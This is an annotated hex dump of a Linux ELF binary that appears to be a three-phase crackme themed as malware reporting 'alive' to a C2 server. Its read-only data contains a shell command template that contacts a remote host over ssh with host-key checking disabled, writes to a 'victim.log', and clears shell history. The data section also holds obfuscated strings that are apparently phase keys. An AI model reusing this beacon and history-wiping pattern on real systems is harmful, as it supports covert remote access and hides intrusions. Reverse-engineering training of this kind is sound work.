0x310:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x320:      42 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |B...............|
0x330:      00 00 00 00 00 00 00 00  7c 00 00 00 12 00 00 00   |........|.......|
0x340:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x350:      6d 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |m...............|
0x360:      00 00 00 00 00 00 00 00  a7 00 00 00 12 00 00 00   |................|
0x370:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x380:      59 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |Y...............|
0x390:      00 00 00 00 00 00 00 00  01 01 00 00 20 00 00 00   |............ ...|
0x3a0:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x3b0:      25 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |%...............|
0x3c0:      00 00 00 00 00 00 00 00  1d 00 00 00 12 00 00 00   |................|
0x3d0:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x3e0:      5f 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |_...............|
0x3f0:      00 00 00 00 00 00 00 00  0b 00 00 00 12 00 00 00   |................|
0x400:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x410:      18 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |................|
0x420:      00 00 00 00 00 00 00 00  83 00 00 00 12 00 00 00   |................|
0x430:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x440:      10 01 00 00 20 00 00 00  00 00 00 00 00 00 00 00   |.... ...........|
0x450:      00 00 00 00 00 00 00 00  8a 00 00 00 22 00 00 00   |............"...|
0x460:      00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x470:      99 00 00 00 12 00 00 00  00 00 00 00 00 00 00 00   |................|
0x480:      00 00 00 00 00 00 00 00  53 00 00 00 11 00 18 00   |........S.......|
0x490:      20 2a 20 00 00 00 00 00  08 00 00 00 00 00 00 00   | * .............|
0x4a0:      75 00 00 00 11 00 18 00  40 2a 20 00 00 00 00 00   |u.......@* .....|
0x4b0:      08 00 00 00 00 00 00 00  00                        |.........       |
; section: .dynstr
0x4b8:      00 6c 69 62 63 2e 73 6f  2e 36 00 5f 5f 70 72 69   |.libc.so.6.__pri|
0x4c8:      6e 74 66 5f 63 68 6b 00  65 78 69 74 00 72 65 67   |ntf_chk.exit.reg|
0x4d8:      65 78 65 63 00 5f 5f 69  73 6f 63 39 39 5f 73 73   |exec.__isoc99_ss|
0x4e8:      63 61 6e 66 00 70 75 74  73 00 72 65 67 66 72 65   |canf.puts.regfre|
0x4f8:      65 00 5f 5f 73 74 61 63  6b 5f 63 68 6b 5f 66 61   |e.__stack_chk_fa|
0x508:      69 6c 00 73 74 64 69 6e  00 66 67 65 74 73 00 5f   |il.stdin.fgets._|
0x518:      5f 73 74 72 6e 63 70 79  5f 63 68 6b 00 72 65 67   |_strncpy_chk.reg|
0x528:      63 6f 6d 70 00 73 74 64  65 72 72 00 73 79 73 74   |comp.stderr.syst|
0x538:      65 6d 00 66 77 72 69 74  65 00 5f 5f 63 78 61 5f   |em.fwrite.__cxa_|
0x548:      66 69 6e 61 6c 69 7a 65  00 5f 5f 73 70 72 69 6e   |finalize.__sprin|
0x558:      74 66 5f 63 68 6b 00 5f  5f 6c 69 62 63 5f 73 74   |tf_chk.__libc_st|
0x568:      61 72 74 5f 6d 61 69 6e  00 47 4c 49 42 43 5f 32   |art_main.GLIBC_2|
0x578:      2e 33 2e 34 00 47 4c 49  42 43 5f 32 2e 37 00 47   |.3.4.GLIBC_2.7.G|
0x588:      4c 49 42 43 5f 32 2e 34  00 47 4c 49 42 43 5f 32   |LIBC_2.4.GLIBC_2|
0x598:      2e 32 2e 35 00 5f 49 54  4d 5f 64 65 72 65 67 69   |.2.5._ITM_deregi|
0x5a8:      73 74 65 72 54 4d 43 6c  6f 6e 65 54 61 62 6c 65   |sterTMCloneTable|
0x5b8:      00 5f 5f 67 6d 6f 6e 5f  73 74 61 72 74 5f 5f 00   |.__gmon_start__.|
0x5c8:      5f 49 54 4d 5f 72 65 67  69 73 74 65 72 54 4d 43   |_ITM_registerTMC|
0x5d8:      6c 6f 6e 65 54 61 62 6c  65 00 00                  |loneTable..     |
; section: .gnu.version
0x5e2:      00 00 00 00 02 00 02 00  03 00 02 00 02 00 02 00   |................|
0x5f2:      02 00 00 00 04 00 05 00  05 00 05 00 02 00 02 00   |................|
0x602:      00 00 02 00 05 00 02 00  02 00 ??                  |..........?     |
; section: .gnu.version_r
0x610:      01 00 04 00 01 00 00 00  10 00 00 00 00 00 00 00   |................|
0x620:      74 19 69 09 00 00 05 00  b9 00 00 00 10 00 00 00   |t.i.............|
0x630:      17 69 69 0d 00 00 04 00  c5 00 00 00 10 00 00 00   |.ii.............|
0x640:      14 69 69 0d 00 00 03 00  cf 00 00 00 10 00 00 00   |.ii.............|
0x650:      75 1a 69 09 00 00 02 00  d9 00 00 00 00 00 00 00   |u.i.............|
0x660:      58                                                 |X               |
; section: .rela.dyn
0x660:      58 1d 20 00 00 00 00 00  08 00 00 00 00 00 00 00   |X. .............|
0x670:      c0 0a 00 00 00 00 00 00  60 1d 20 00 00 00 00 00   |........`. .....|
0x680:      08 00 00 00 00 00 00 00  80 0a 00 00 00 00 00 00   |................|
0x690:      08 20 20 00 00 00 00 00  08 00 00 00 00 00 00 00   |.  .............|
0x6a0:      08 20 20 00 00 00 00 00  00 2a 20 00 00 00 00 00   |.  ......* .....|
0x6b0:      08 00 00 00 00 00 00 00  e8 11 00 00 00 00 00 00   |................|
0x6c0:      08 2a 20 00 00 00 00 00  08 00 00 00 00 00 00 00   |.* .............|
0x6d0:      8f 10 00 00 00 00 00 00  d8 1f 20 00 00 00 00 00   |.......... .....|
0x6e0:      06 00 00 00 01 00 00 00  00 00 00 00 00 00 00 00   |................|
0x6f0:      e0 1f 20 00 00 00 00 00  06 00 00 00 07 00 00 00   |.. .............|
0x700:      00 00 00 00 00 00 00 00  e8 1f 20 00 00 00 00 00   |.......... .....|
0x710:      06 00 00 00 09 00 00 00  00 00 00 00 00 00 00 00   |................|
0x720:      f0 1f 20 00 00 00 00 00  06 00 00 00 10 00 00 00   |.. .............|
0x730:      00 00 00 00 00 00 00 00  f8 1f 20 00 00 00 00 00   |.......... .....|
0x740:      06 00 00 00 11 00 00 00  00 00 00 00 00 00 00 00   |................|
0x750:      20 2a 20 00 00 00 00 00  05 00 00 00 13 00 00 00   | * .............|
0x760:      00 00 00 00 00 00 00 00  40 2a 20 00 00 00 00 00   |........@* .....|
0x770:      05 00 00 00 14 00 00 00  00 00 00 00 00 00 00 00   |................|
0x780:      70                                                 |p               |
; section: .rela.plt
0x780:      70 1f 20 00 00 00 00 00  07 00 00 00 02 00 00 00   |p. .............|
0x790:      00 00 00 00 00 00 00 00  78 1f 20 00 00 00 00 00   |........x. .....|
0x7a0:      07 00 00 00 03 00 00 00  00 00 00 00 00 00 00 00   |................|
0x7b0:      80 1f 20 00 00 00 00 00  07 00 00 00 04 00 00 00   |.. .............|
0x7c0:      00 00 00 00 00 00 00 00  88 1f 20 00 00 00 00 00   |.......... .....|
0x7d0:      07 00 00 00 05 00 00 00  00 00 00 00 00 00 00 00   |................|
0x7e0:      90 1f 20 00 00 00 00 00  07 00 00 00 06 00 00 00   |.. .............|
0x7f0:      00 00 00 00 00 00 00 00  98 1f 20 00 00 00 00 00   |.......... .....|
0x800:      07 00 00 00 08 00 00 00  00 00 00 00 00 00 00 00   |................|
0x810:      a0 1f 20 00 00 00 00 00  07 00 00 00 0a 00 00 00   |.. .............|
0x820:      00 00 00 00 00 00 00 00  a8 1f 20 00 00 00 00 00   |.......... .....|
0x830:      07 00 00 00 0b 00 00 00  00 00 00 00 00 00 00 00   |................|
0x840:      b0 1f 20 00 00 00 00 00  07 00 00 00 0c 00 00 00   |.. .............|
0x850:      00 00 00 00 00 00 00 00  b8 1f 20 00 00 00 00 00   |.......... .....|
0x860:      07 00 00 00 0d 00 00 00  00 00 00 00 00 00 00 00   |................|
0x870:      c0 1f 20 00 00 00 00 00  07 00 00 00 0e 00 00 00   |.. .............|
0x880:      00 00 00 00 00 00 00 00  c8 1f 20 00 00 00 00 00   |.......... .....|
0x890:      07 00 00 00 0f 00 00 00  00 00 00 00 00 00 00 00   |................|
0x8a0:      d0 1f 20 00 00 00 00 00  07 00 00 00 12 00 00 00   |.. .............|
0x8b0:      00 00 00 00 00 00 00 00  48                        |........H       |
; section: .rodata
0x1010:     01 00 02 00                                        |....            |
0x1014:     45 6e 74 65 72 20 6b 65  79 20 66 6f 72 20 66 61   |Enter key for fa|   "Enter key for faze 1: "
0x1024:     7a 65 20 31 3a 20 00                               |ze 1: .         |
0x102b:     25 73 00                                           |%s.             |   "%s"
0x102e:     45 6e 74 65 72 20 6b 65  79 20 66 6f 72 20 66 61   |Enter key for fa|   "Enter key for faze 2: "
0x103e:     7a 65 20 32 3a 20 00                               |ze 2: .         |
0x1045:     45 6e 74 65 72 20 6b 65  79 20 66 6f 72 20 66 61   |Enter key for fa|   "Enter key for faze 3: "
0x1055:     7a 65 20 33 3a 20 00                               |ze 3: .         |
0x105c:     25 64 20 25 64 20 25 64  20 25 64 00               |%d %d %d %d.    |   "%d %d %d %d"
0x1068:     43 6f 75 6c 64 20 6e 6f  74 20 63 6f 6d 70 69 6c   |Could not compil|   "Could not compile regex\n"
0x1078:     65 20 72 65 67 65 78 0a  00                        |e regex..       |
0x1081:     65 78 69 74 20 63 6f 64  65 20 25 64 0a 00         |exit code %d..  |   "exit code %d\n"
0x108f:     68 61 63 6b 65 72 00                               |hacker.         |   "hacker"
0x1096:     00 00                                              |..              |
0x1098:     55 53 41 47 45 3a 0a 25  73 20 3c 69 70 5f 61 64   |USAGE:.%s <ip_ad|   "USAGE:\n%s <ip_addr>\n\nip_addr:\tC2 server's IP address [\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}], e.g. 192.168.0.1\n\nDESCRIPTION:\n\tReport alive to C2 server.\n"
0x10a8:     64 72 3e 0a 0a 69 70 5f  61 64 64 72 3a 09 43 32   |dr>..ip_addr:.C2|
0x10b8:     20 73 65 72 76 65 72 27  73 20 49 50 20 61 64 64   | server's IP add|
0x10c8:     72 65 73 73 20 5b 5c 64  7b 31 2c 33 7d 5c 2e 5c   |ress [\d{1,3}\.\|
0x10d8:     64 7b 31 2c 33 7d 5c 2e  5c 64 7b 31 2c 33 7d 5c   |d{1,3}\.\d{1,3}\|
0x10e8:     2e 5c 64 7b 31 2c 33 7d  5d 2c 20 65 2e 67 2e 20   |.\d{1,3}], e.g. |
0x10f8:     31 39 32 2e 31 36 38 2e  30 2e 31 0a 0a 44 45 53   |192.168.0.1..DES|
0x1108:     43 52 49 50 54 49 4f 4e  3a 0a 09 52 65 70 6f 72   |CRIPTION:..Repor|
0x1118:     74 20 61 6c 69 76 65 20  74 6f 20 43 32 20 73 65   |t alive to C2 se|
0x1128:     72 76 65 72 2e 0a 00                               |rver...         |
0x112f:     00                                                 |.               |
0x1130:     65 63 68 6f 20 25 73 20  7c 20 73 73 68 20 2d 6f   |echo %s | ssh -o|   "echo %s | ssh -o StrictHostKeyChecking=no %s@%s \"TIME=`date` echo alive at $TIME >> /home/%s/victim.log\" && history -c"
0x1140:     20 53 74 72 69 63 74 48  6f 73 74 4b 65 79 43 68   | StrictHostKeyCh|
0x1150:     65 63 6b 69 6e 67 3d 6e  6f 20 25 73 40 25 73 20   |ecking=no %s@%s |
0x1160:     22 54 49 4d 45 3d 60 64  61 74 65 60 20 65 63 68   |"TIME=`date` ech|
0x1170:     6f 20 61 6c 69 76 65 20  61 74 20 24 54 49 4d 45   |o alive at $TIME|
0x1180:     20 3e 3e 20 2f 68 6f 6d  65 2f 25 73 2f 76 69 63   | >> /home/%s/vic|
0x1190:     74 69 6d 2e 6c 6f 67 22  20 26 26 20 68 69 73 74   |tim.log" && hist|
0x11a0:     6f 72 79 20 2d 63 00                               |ory -c.         |
0x11a7:     00                                                 |.               |
0x11a8:     5b 2d 5d 20 43 6f 6d 70  6c 65 74 65 20 61 6c 6c   |[-] Complete all|   "[-] Complete all 3 fazes to successfully report back alive."
0x11b8:     20 33 20 66 61 7a 65 73  20 74 6f 20 73 75 63 63   | 3 fazes to succ|
0x11c8:     65 73 73 66 75 6c 6c 79  20 72 65 70 6f 72 74 20   |essfully report |
0x11d8:     62 61 63 6b 20 61 6c 69  76 65 2e 00               |back alive..    |
0x11e4:     00 00 00 00                                        |....            |
0x11e8:     5e 5b 30 2d 39 5d 5c 7b  31 2c 33 5c 7d 5c 2e 5b   |^[0-9]\{1,3\}\.[|   "^[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}\\.[0-9]\\{1,3\\}$"
0x11f8:     30 2d 39 5d 5c 7b 31 2c  33 5c 7d 5c 2e 5b 30 2d   |0-9]\{1,3\}\.[0-|
0x1208:     39 5d 5c 7b 31 2c 33 5c  7d 5c 2e 5b 30 2d 39 5d   |9]\{1,3\}\.[0-9]|
0x1218:     5c 7b 31 2c 33 5c 7d 24  00                        |\{1,3\}$.       |
0x1221:     00 00 00 00 00 00 00 01                            |........        |
; section: .eh_frame_hdr
0x1228:     01 1b 03 3b 64 00 00 00  0b 00 00 00 a8 f6 ff ff   |...;d...........|
0x1238:     b0 00 00 00 88 f7 ff ff  d8 00 00 00 98 f7 ff ff   |................|
0x1248:     80 00 00 00 a2 f8 ff ff  f0 00 00 00 cb f9 ff ff   |................|
0x1258:     18 01 00 00 b5 fa ff ff  3c 01 00 00 a0 fb ff ff   |........<.......|
0x1268:     58 01 00 00 c2 fb ff ff  70 01 00 00 4d fc ff ff   |X.......p...M...|
0x1278:     90 01 00 00 68 fd ff ff  d0 01 00 00 d8 fd ff ff   |....h...........|
0x1288:     18 02 00 00 ??                                     |....?           |
; section: .eh_frame
0x1290:     14 00 00 00 00 00 00 00  01 7a 52 00 01 78 10 01   |.........zR..x..|
0x12a0:     1b 0c 07 08 90 01 07 10  14 00 00 00 1c 00 00 00   |................|
0x12b0:     10 f7 ff ff 2b 00 00 00  00 00 00 00 00 00 00 00   |....+...........|
0x12c0:     14 00 00 00 00 00 00 00  01 7a 52 00 01 78 10 01   |.........zR..x..|
0x12d0:     1b 0c 07 08 90 01 00 00  24 00 00 00 1c 00 00 00   |........$.......|
0x12e0:     f0 f5 ff ff e0 00 00 00  00 0e 10 46 0e 18 4a 0f   |...........F..J.|
0x12f0:     0b 77 08 80 00 3f 1a 3b  2a 33 24 22 00 00 00 00   |.w...?.;*3$"....|
0x1300:     14 00 00 00 44 00 00 00  a8 f6 ff ff 08 00 00 00   |....D...........|
0x1310:     00 00 00 00 00 00 00 00  24 00 00 00 5c 00 00 00   |........$...\...|
0x1320:     aa f7 ff ff 29 01 00 00  00 41 0e 10 83 02 44 0e   |....)....A....D.|
0x1330:     80 01 03 1d 01 0a 0e 10  41 0e 08 41 0b 00 00 00   |........A..A....|
0x1340:     20 00 00 00 84 00 00 00  ab f8 ff ff ea 00 00 00   | ...............|
0x1350:     00 41 0e 10 83 02 44 0e  80 01 02 de 0a 0e 10 41   |.A....D........A|
0x1360:     0e 08 41 0b 18 00 00 00  a8 00 00 00 71 f9 ff ff   |..A.........q...|
0x1370:     eb 00 00 00 00 44 0e 30  02 a3 0a 0e 08 41 0b 00   |.....D.0.....A..|
0x1380:     14 00 00 00 c4 00 00 00  40 fa ff ff 22 00 00 00   |........@..."...|
0x1390:     00 44 0e 10 5d 0e 08 00  1c 00 00 00 dc 00 00 00   |.D..]...........|
0x13a0:     4a fa ff ff 8b 00 00 00  00 41 0e 10 83 02 02 62   |J........A.....b|
0x13b0:     0a 0e 08 41 0b 00 00 00  3c 00 00 00 fc 00 00 00   |...A....<.......|
0x13c0:     b5 fa ff ff 17 01 00 00  00 41 0e 10 86 02 41 0e   |.........A....A.|
0x13d0:     18 83 03 44 0e 90 01 7d  0a 0e 18 41 0e 10 41 0e   |...D...}...A..A.|
0x13e0:     08 41 0b 02 6a 0e 98 01  41 0e a0 01 02 5c 0e 90   |.A..j...A....\..|
0x13f0:     01 00 00 00 00 00 00 00  44 00 00 00 3c 01 00 00   |........D...<...|
0x1400:     90 fb ff ff 65 00 00 00  00 42 0e 10 8f 02 42 0e   |....e....B....B.|
0x1410:     18 8e 03 45 0e 20 8d 04  42 0e 28 8c 05 48 0e 30   |...E. ..B.(..H.0|
0x1420:     86 06 48 0e 38 83 07 4d  0e 40 72 0e 38 41 0e 30   |..H.8..M.@r.8A.0|
0x1430:     41 0e 28 42 0e 20 42 0e  18 42 0e 10 42 0e 08 00   |A.(B. B..B..B...|
0x1440:     10 00 00 00 84 01 00 00  b8 fb ff ff 02 00 00 00   |................|
0x1450:     00 00 00 00 00 00 00 00  ??                        |........?       |
; section: .init_array
0x201d58:   c0 0a 00 00 00 00 00 00  80                        |.........       |
; section: .fini_array
0x201d60:   80 0a 00 00 00 00 00 00  01                        |.........       |
; section: .dynamic
0x201d68:   01 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00   |................|
0x201d78:   0c 00 00 00 00 00 00 00  b8 08 00 00 00 00 00 00   |................|
0x201d88:   0d 00 00 00 00 00 00 00  04 10 00 00 00 00 00 00   |................|
0x201d98:   19 00 00 00 00 00 00 00  58 1d 20 00 00 00 00 00   |........X. .....|
0x201da8:   1b 00 00 00 00 00 00 00  08 00 00 00 00 00 00 00   |................|
0x201db8:   1a 00 00 00 00 00 00 00  60 1d 20 00 00 00 00 00   |........`. .....|
0x201dc8:   1c 00 00 00 00 00 00 00  08 00 00 00 00 00 00 00   |................|
0x201dd8:   f5 fe ff 6f 00 00 00 00  98 02 00 00 00 00 00 00   |...o............|
0x201de8:   05 00 00 00 00 00 00 00  b8 04 00 00 00 00 00 00   |................|
0x201df8:   06 00 00 00 00 00 00 00  c0 02 00 00 00 00 00 00   |................|
0x201e08:   0a 00 00 00 00 00 00 00  2a 01 00 00 00 00 00 00   |........*.......|
0x201e18:   0b 00 00 00 00 00 00 00  18 00 00 00 00 00 00 00   |................|
0x201e28:   15 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201e38:   03 00 00 00 00 00 00 00  58 1f 20 00 00 00 00 00   |........X. .....|
0x201e48:   02 00 00 00 00 00 00 00  38 01 00 00 00 00 00 00   |........8.......|
0x201e58:   14 00 00 00 00 00 00 00  07 00 00 00 00 00 00 00   |................|
0x201e68:   17 00 00 00 00 00 00 00  80 07 00 00 00 00 00 00   |................|
0x201e78:   07 00 00 00 00 00 00 00  60 06 00 00 00 00 00 00   |........`.......|
0x201e88:   08 00 00 00 00 00 00 00  20 01 00 00 00 00 00 00   |........ .......|
0x201e98:   09 00 00 00 00 00 00 00  18 00 00 00 00 00 00 00   |................|
0x201ea8:   1e 00 00 00 00 00 00 00  08 00 00 00 00 00 00 00   |................|
0x201eb8:   fb ff ff 6f 00 00 00 00  01 00 00 08 00 00 00 00   |...o............|
0x201ec8:   fe ff ff 6f 00 00 00 00  10 06 00 00 00 00 00 00   |...o............|
0x201ed8:   ff ff ff 6f 00 00 00 00  01 00 00 00 00 00 00 00   |...o............|
0x201ee8:   f0 ff ff 6f 00 00 00 00  e2 05 00 00 00 00 00 00   |...o............|
0x201ef8:   f9 ff ff 6f 00 00 00 00  05 00 00 00 00 00 00 00   |...o............|
0x201f08:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201f18:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201f28:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201f38:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201f48:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201f58:   68                                                 |h               |
; section: .got
0x201f58:   68 1d 20 00 00 00 00 00  00 00 00 00 00 00 00 00   |h. .............|
0x201f68:   00 00 00 00 00 00 00 00  e6 08 00 00 00 00 00 00   |................|
0x201f78:   f6 08 00 00 00 00 00 00  06 09 00 00 00 00 00 00   |................|
0x201f88:   16 09 00 00 00 00 00 00  26 09 00 00 00 00 00 00   |........&.......|
0x201f98:   36 09 00 00 00 00 00 00  46 09 00 00 00 00 00 00   |6.......F.......|
0x201fa8:   56 09 00 00 00 00 00 00  66 09 00 00 00 00 00 00   |V.......f.......|
0x201fb8:   76 09 00 00 00 00 00 00  86 09 00 00 00 00 00 00   |v...............|
0x201fc8:   96 09 00 00 00 00 00 00  a6 09 00 00 00 00 00 00   |................|
0x201fd8:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201fe8:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x201ff8:   00 00 00 00 00 00 00 00  00                        |.........       |
; section: .data
0x202000:   00 00 00 00 00 00 00 00  08 20 20 00 00 00 00 00   |.........  .....|
0x202010:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202020:   48 43 2c 6a 2e 00                                  |HC,j..          |   "HC,j."
0x202026:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202036:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202046:   00 00 00 00 00 00 00 00  00 00 00 00 46 65 56 50   |............FeVP|
0x202056:   27 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |'...............|
0x202066:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202076:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 29 65   |..............)e|
0x202086:   7e 76 2b 00 00 00 00 00  00 00 00 00 00 00 00 00   |~v+.............|
0x202096:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2020a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2020b6:   34 5f 44 42 5f 00 00 00  00 00 00 00 00 00 00 00   |4_DB_...........|
0x2020c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2020d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2020e6:   00 00 4f 63 52 2c 33 00  00 00 00 00 00 00 00 00   |..OcR,3.........|
0x2020f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202106:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202116:   00 00 00 00 7c 6d 75 2a  3a 00 00 00 00 00 00 00   |....|mu*:.......|
0x202126:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202136:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202146:   00 00 00 00 00 00 72 21  78 4b 77 00 00 00 00 00   |......r!xKw.....|
0x202156:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202166:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202176:   00 00 00 00 00 00 00 00  44 6b 5c 7a 55 00 00 00   |........Dk\zU...|
0x202186:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202196:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2021a6:   00 00 00 00 00 00 00 00  00 00 68 4d 4c 5c 4a 00   |..........hML\J.|
0x2021b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2021c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2021d6:   00 00 00 00 00 00 00 00  00 00 00 00 7b 57 50 59   |............{WPY|
0x2021e6:   6d 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |m...............|
0x2021f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202206:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 52 36   |..............R6|
0x202216:   33 4a 4b 00 00 00 00 00  00 00 00 00 00 00 00 00   |3JK.............|
0x202226:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202236:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202246:   4c 4c 77 38 2d 00 00 00  00 00 00 00 00 00 00 00   |LLw8-...........|
0x202256:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202266:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202276:   00 00 6f 41 6c 6d 61 00  00 00 00 00 00 00 00 00   |..oAlma.........|
0x202286:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202296:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2022a6:   00 00 00 00 25 66 7c 6d  34 00 00 00 00 00 00 00   |....%f|m4.......|
0x2022b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2022c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2022d6:   00 00 00 00 00 00 5c 6f  65 5e 2b 00 00 00 00 00   |......\oe^+.....|
0x2022e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2022f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202306:   00 00 00 00 00 00 00 00  45 34 4b 79 47 00 00 00   |........E4KyG...|
0x202316:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202326:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202336:   00 00 00 00 00 00 00 00  00 00 22 72 29 64 59 00   |.........."r)dY.|
0x202346:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202356:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202366:   00 00 00 00 00 00 00 00  00 00 00 00 58 32 39 41   |............X29A|
0x202376:   46 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |F...............|
0x202386:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202396:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 2f 6e   |............../n|
0x2023a6:   5f 30 52 00 00 00 00 00  00 00 00 00 00 00 00 00   |_0R.............|
0x2023b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2023c6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2023d6:   6e 33 7a 72 40 00 00 00  00 00 00 00 00 00 00 00   |n3zr@...........|
0x2023e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2023f6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202406:   00 00 2d 4b 71 40 56 00  00 00 00 00 00 00 00 00   |..-Kq@V.........|
0x202416:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202426:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202436:   00 00 00 00 6c 70 57 4d  41 00 00 00 00 00 00 00   |....lpWMA.......|
0x202446:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202456:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202466:   00 00 00 00 00 00 5a 28  6b 3a 35 00 00 00 00 00   |......Z(k:5.....|
0x202476:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202486:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202496:   00 00 00 00 00 00 00 00  59 40 52 37 79 00 00 00   |........Y@R7y...|
0x2024a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2024b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2024c6:   00 00 00 00 00 00 00 00  00 00 53 6e 74 31 61 00   |..........Snt1a.|
0x2024d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2024e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2024f6:   00 00 00 00 00 00 00 00  00 00 00 00 75 39 32 48   |............u92H|
0x202506:   26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |&...............|
0x202516:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202526:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 51 3f   |..............Q?|
0x202536:   56 65 7c 00 00 00 00 00  00 00 00 00 00 00 00 00   |Ve|.............|
0x202546:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202556:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202566:   2e 75 39 66 6f 00 00 00  00 00 00 00 00 00 00 00   |.u9fo...........|
0x202576:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202586:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x202596:   00 00 71 38 59 3b 45 00  00 00 00 00 00 00 00 00   |..q8Y;E.........|
0x2025a6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2025b6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2025c6:   00 00 00 00 4e 36 23 4a  25 00 00 00 00 00 00 00   |....N6#J%.......|
0x2025d6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
0x2025e6:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|
